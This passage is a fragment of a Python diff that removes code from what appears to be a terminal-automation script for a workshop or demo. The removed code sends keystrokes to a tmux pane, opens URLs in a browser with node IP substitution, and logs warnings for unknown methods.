-           match = match.replace('\n', '')
-           send_keys(match + '\n')
-           # FIXME: we should factor out the "bash" method
-           wait_for_prompt()
-           check_exit_status()
-       elif method == "open":
-           # Cheap way to get node1's IP address
-           screen = capture_pane()
-           url = data.replace("/node1", "/{}".format(IPADDR))
-           # This should probably be adapted to run on different OS
-           if state.open_links:
-               subprocess.check_output(["xdg-open", url])
-               focus_browser()
-           if state.interactive:
-               print("Press any key to continue to next step...")
-               click.getchar()
-       else:
-           logging.warning("Unknown method {}: {!r}".format(method, data))
-       move_forward()

    else:
        logging.warning("Unknown command {}.".format(command))